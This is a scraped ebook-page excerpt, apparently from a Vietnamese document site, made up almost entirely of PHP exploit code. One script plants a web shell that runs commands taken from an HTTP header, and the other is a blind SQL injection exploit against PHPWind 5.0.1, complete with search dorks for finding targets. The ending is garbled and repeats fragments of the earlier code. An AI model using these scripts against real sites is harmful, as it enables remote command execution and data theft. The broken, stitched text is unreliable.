1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 421 pot

6 85 0

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Nội dung

but I prefer posts because we do not have an .htaccess in blogs/posts/ folder "0.php" string is appended to a new post filename */ $shell='<script language="php">error_reporting(0); set_time_limit(0); echo "my_delim"; passthru($_SERVER[HTTP_CLIENT_IP]); echo "my_delim";</script>'; $data=' 7d61bcd1f033e Content-Disposition: form-data; name="f"; suntzu_'.$v.' 7d61bcd1f033e Content-Disposition: form-data; name="newmessage"; '.$shell.' 7d61bcd1f033e Content-Disposition: form-data; name="newusername"; 1 7d61bcd1f033e Content-Disposition: form-data; name="adminuser"; 1 7d61bcd1f033e Content-Disposition: form-data; name="permission"; 1 7d61bcd1f033e '; $packet ="POST ".$p."blog.php HTTP/1.0\r\n"; $packet.="Content-Type: multipart/form-data; boundary= 7d61bcd1f033e\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: close\r\n\r\n"; $packet.=$data; sendpacketii($packet); sleep(2); $packet ="GET ".$p."blogs/posts/suntzu_".$v."0.php HTTP/1.0\r\n"; $packet.="CLIENT-IP:".$cmd."\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: close\r\n\r\n"; sendpacketii($packet); if (eregi("my_delim",$html)) { $temp=explode("my_delim",$html); echo $temp[1]; } else { echo "exploit failed "; } ?> black_hat_cr(HCE) PHPWind <= 5.0.1 (AdminUser) Remote Blind SQL Injection Exploit Code: <?php print_r(' PHPWind <= 5.0.1 "AdminUser" blind SQL injection exploit by rgod retrog@alice.it site: http://retrogod.altervista.org dorks: "powered by phpwind" "powered by phpwind v5.0.1" -site:phpwind.net '); if ($argc<3) { print_r(' Usage: php '.$argv[0].' host path OPTIONS host: target server (ip/hostname) path: path to phpwind Options: -p[port]: specify a port other than 80 -P[ip:port]: specify a proxy -t[n]: adjust query timeout (default: 10) -b[n]: adjust the delay for benchmark() -e[key]: specify an encryption key, if you have it it is an md5 fragment (18 chars) Example: php '.$argv[0].' localhost /phpwind/ -P1.1.1.1:80 php '.$argv[0].' localhost / -p81 php '.$argv[0].' localhost /forum/ -t15 -b20000000 php '.$argv[0].' localhost / -t15 -b20000000 php '.$argv[0].' localhost / -t15 -e298af45091ebcdfbcd '); die; } error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { return; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy ';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy \r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy ';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); } $host=$argv[1]; $path=$argv[2]; $port=80; $timeout=10; $proxy=""; $b=200000000; $e=""; for ($i=3; $i<$argc; $i++){ $temp=$argv[$i][0].$argv[$i][1]; if ($temp=="-p") { $port=str_replace("-p","",$argv[$i]); } if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); } if ($temp=="-t") { $timeout=(int) str_replace("-t","",$argv[$i]); } if ($temp=="-b") { $b=(int) str_replace("-b","",$argv[$i]); } if ($temp=="-e") { $e=str_replace("-e","",$argv[$i]); if (!is_my_key($e)){ die("not a valid key "); } else { $GLOBALS['my_fragment']=$e; } } } if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} . ';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy "; $ock=fsockopen($parts[0],$parts[1]); if (!$ock). $packet ="POST ".$p."blog.php HTTP/1.0 "; $packet.="Content-Type: multipart/form-data; boundary= 7d61bcd1f033e "; $packet.="Host: ".$host." ";

Ngày đăng: 04/07/2014, 12:20